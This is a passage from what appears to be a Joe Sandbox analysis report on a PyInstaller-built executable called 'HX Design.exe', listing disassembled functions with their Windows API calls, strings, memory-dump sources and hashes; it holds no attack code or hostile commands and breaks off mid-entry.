DialogBoxIndirectParamW.USER32 ref: 00007FF73206248E
DeleteObject.GDI32 ref: 00007FF7320624C1
DestroyIcon.USER32 ref: 00007FF7320624D3

Strings

Unhandled exception in script, xrefs: 00007FF7320623F8

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
Instruction ID: 777644cc3ed31458f20c14535f226a9951ffdaa53cc1dcfabbf4cfbc9e3791a4
Opcode Fuzzy Hash: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
Instruction Fuzzy Hash: 5031837271968199EB20FF21E8552FAA360FF88788F840135EA4D87B5ADF7CD108D710

Function 00007FF732062B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF73206918F,?,00007FF732063C55), ref: 00007FF732062BA0
MessageBoxW.USER32 ref: 00007FF732062C2A

Strings

WARNING, xrefs: 00007FF732062BAF
Warning, xrefs: 00007FF732062C1D
[PYI-%d:%ls] , xrefs: 00007FF732062BA8

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
Instruction ID: 6c2ff5dee5daf53e4cd41c89d6dcd444d7a53b8cddbd14a373a39e3ef6f3afaf
Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
Instruction Fuzzy Hash: 0721F432708B41A2E710AB14F8447EAB3A4FB88780F804136EE8D93756EF7CD649C750

Function 00007FF732062710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF732061B99), ref: 00007FF732062760

Strings

ERROR, xrefs: 00007FF73206276F
Error [ANSI Fallback], xrefs: 00007FF7320627CF
Error, xrefs: 00007FF7320627DE
[PYI-%d:%s] , xrefs: 00007FF732062768

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
Instruction ID: 6f0ddf64b30ce57bc7c4a3b5286dd292a5ff2cf1553aa8f40079a70b5259f87b
Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
Instruction Fuzzy Hash: CC21A132B19781A2E720AB54F8407EAA394FB88784F800132FE8C83759EFBCD149D750

Function 00007FF732079A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF732079AAD
GetProcAddress.KERNEL32 ref: 00007FF732079AC3
FreeLibrary.KERNEL32 ref: 00007FF732079AEA

Strings

mscoree.dll, xrefs: 00007FF732079AA4
CorExitProcess, xrefs: 00007FF732079ABC

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
Instruction ID: 4c8ac577bc84f2e3598a64fa95ceeedc12c0a91acfa27cf058b7d1a88a5209b2
Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
Instruction Fuzzy Hash: 29F0C221B0A706A1EE10AB24E48537AA320EF45760FD40235C67E862F4CFACD04CE360

Function 00007FF732089368 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF732089390
_set_statfp.LIBCMT ref: 00007FF7320893AB
_set_statfp.LIBCMT ref: 00007FF7320893C7
_set_statfp.LIBCMT ref: 00007FF732089403

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: 4857583898f123c196153820948167680cf688ed728d379dc45ad4bd8587d776
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: A4118222E5CA0B22FA653165E4D137B9050EF59370F840634EBEE173D68EEC6849E120

Function 00007FF73207B390 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF73207A5A3,?,?,00000000,00007FF73207A83E,?,?,?,?,?,00007FF73207A7CA), ref: 00007FF73207B3AF
FlsSetValue.KERNEL32(?,?,?,00007FF73207A5A3,?,?,00000000,00007FF73207A83E,?,?,?,?,?,00007FF73207A7CA), ref: 00007FF73207B3CE
FlsSetValue.KERNEL32(?,?,?,00007FF73207A5A3,?,?,00000000,00007FF73207A83E,?,?,?,?,?,00007FF73207A7CA), ref: 00007FF73207B3F6
FlsSetValue.KERNEL32(?,?,?,00007FF73207A5A3,?,?,00000000,00007FF73207A83E,?,?,?,?,?,00007FF73207A7CA), ref: 00007FF73207B407
FlsSetValue.KERNEL32(?,?,?,00007FF73207A5A3,?,?,00000000,00007FF73207A83E,?,?,?,?,?,00007FF73207A7CA), ref: 00007FF73207B418

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
Instruction ID: d91933723b99941e9c2a813186865576ca2d83b7731c0a95a87b2dcec63515c8
Opcode Fuzzy Hash: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
Instruction Fuzzy Hash: 10117F30E0C642A2FA58B3299941179E1815F547B0FD84334E93E567D6DEACA85AE720

Function 00007FF73207B224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF73207B235
FlsSetValue.KERNEL32 ref: 00007FF73207B254
FlsSetValue.KERNEL32 ref: 00007FF73207B27C
FlsSetValue.KERNEL32 ref: 00007FF73207B28D
FlsSetValue.KERNEL32 ref: 00007FF73207B29E

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
Instruction ID: 9a2b1dbf7c303c19e24e2778d57d8ccbda81e9d6edeae1bf8e1bec8b0bc80eeb
Opcode Fuzzy Hash: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
Instruction Fuzzy Hash: B7113920E0E207A1FAA8727D481557E92824F65330FD84734D93E4A7D2DDACB85AF7B1

Function 00007FF732075FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF732075FDC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF732076106
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7320761BC

Strings

verbose, xrefs: 00007FF732075FB0

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: 3270c31eed4857952a290424676e7a39f7fd3d33aded40a8c2093a8f6b47a28d
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: 8B91E332A08A46A5F761BE28D45437EB7A1AB40B54FC84132DA5F433D6DFBCE409E360

Function 00007FF73207FBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF73207FEA7

Part of subcall function 00007FF732077A3C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF732077A59

Strings

UTF-16LEUNICODE, xrefs: 00007FF73207FE45
ccs, xrefs: 00007FF73207FDE2
UTF-8, xrefs: 00007FF73207FE26

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
Instruction ID: 94d5728b028eeeb74cbb77884a9a00c7886a046a4c8429e576379bb99012ac0d
Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
Instruction Fuzzy Hash: DB81C272D08243A5F764BF2D8118278A6A2EB11B84FD58031CA2D97295CFECFC49F721

Function 00007FF73206D648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF73206D673
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF73206D70A
RtlUnwindEx.KERNEL32 ref: 00007FF73206D764

Strings

csm, xrefs: 00007FF73206D6F1

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
Instruction ID: d3077df64576c4ac8c499069be1209d2df6c603a8054bbb2a18b5d5ce8768f7e
Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
Instruction Fuzzy Hash: 9451E432B19642AADB14EF15E044A78B391FB44F88F908130DE6E57788EFBDE845D714

Function 00007FF73206F288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF73206F2B0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF73206F398

Strings

csm, xrefs: 00007FF73206F2D2
csm, xrefs: 00007FF73206F3EA

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
Instruction ID: 3ff0ec4118221d5c5f5fa347dd57f2d483cbbc59d068c7651b482b107c95a8bd
Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
Instruction Fuzzy Hash: C351B3327083429AEB34AB21D088269B7A0FB55B84F985136DA5E47F85CFBCE458D718

Function 00007FF73206EED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF73206EF37
_CallSETranslator.LIBVCRUNTIME ref: 00007FF73206EF83

Strings

MOC, xrefs: 00007FF73206EF4B
RCC, xrefs: 00007FF73206EF53

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
Instruction ID: 4d90f1188ff7a7f9464b9f797c1b8cba77273c5fc9dd3856ad185efe238e326c
Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
Instruction Fuzzy Hash: 0B61A432A08BC595E730AF15E4407AAF7A0FB94784F444225EB9D07B5ADFBCD194CB14

Function 00007FF732062810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF7320628EA

Strings

ERROR, xrefs: 00007FF73206286F
[PYI-%d:%ls] , xrefs: 00007FF732062868
Error, xrefs: 00007FF7320628DD

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
Instruction ID: 18d21326473585813f69bcac6c3857d141485184f55478114089c1c0fb3aafce
Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
Instruction Fuzzy Hash: EF21F772B08B41A2E710AB14F8447EAB3A0FB88780F804136EE8D93756EF7CD649D750

Function 00007FF73207C5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF73207C61F
WriteFile.KERNEL32 ref: 00007FF73207C8E7
WriteFile.KERNEL32 ref: 00007FF73207C92D
GetLastError.KERNEL32 ref: 00007FF73207C9E3

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
Instruction ID: d1f7a5cd22fe3baa11bd6ef399f1b89cb33fadc80c2f0bc43816602d35b28729
Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
Instruction Fuzzy Hash: 8DD14872B08A8099E750EF79C4442FCB7B1FB54798B804236DE5E97B99DE78D00AD310

Function 00007FF7320620C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF7320620F4
SetWindowLongPtrW.USER32 ref: 00007FF732062116
GetWindowLongPtrW.USER32 ref: 00007FF732062140
InvalidateRect.USER32 ref: 00007FF732062160

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: 82fb2f56c599b5cc0937f283f898b1152c69182c9412d4b5909f295937462b98
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: 35110C21F0C14692F654A769E54527AD292EF98780FC45030DF4907B9ECDBDD4C9E214

Function 00007FF732085B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF732081760: _invalid_parameter_noinfo.LIBCMT ref: 00007FF732081793

_get_daylight.LIBCMT ref: 00007FF732085C34
_get_daylight.LIBCMT ref: 00007FF732085C45

Strings

?, xrefs: 00007FF732085BC5

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
Instruction ID: 06acb41969bff98b8cf1a810aefbbc501edfce859f636a530e9ecd1182c6261c
Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
Instruction Fuzzy Hash: E8414822A0828266FB60BB65D40137BEFA0EF90BA4F944235EF5C06AD5DFBCD445DB10

Function 00007FF732079014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF732079046

Part of subcall function 00007FF73207A948: RtlFreeHeap.NTDLL(?,?,?,00007FF732082D22,?,?,?,00007FF732082D5F,?,?,00000000,00007FF732083225,?,?,?,00007FF732083157), ref: 00007FF73207A95E
Part of subcall function 00007FF73207A948: GetLastError.KERNEL32(?,?,?,00007FF732082D22,?,?,?,00007FF732082D5F,?,?,00000000,00007FF732083225,?,?,?,00007FF732083157), ref: 00007FF73207A968

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF73206CBA5), ref: 00007FF732079064

Strings

C:\Users\user\Desktop\HX Design.exe, xrefs: 00007FF732079052

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\HX Design.exe
API String ID: 3580290477-898117248
Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
Instruction ID: 5393ec9a557832e947cf457e9475c331e447da74764146fa45b56320814ce413
Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
Instruction Fuzzy Hash: 5F41A032A08B46A9EB54FF29D4400BDA3A4EF447D0BD54035E98D43B85DF7CE4A9E360

Function 00007FF73207CC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF73207CD4F
GetLastError.KERNEL32 ref: 00007FF73207CD71

Strings

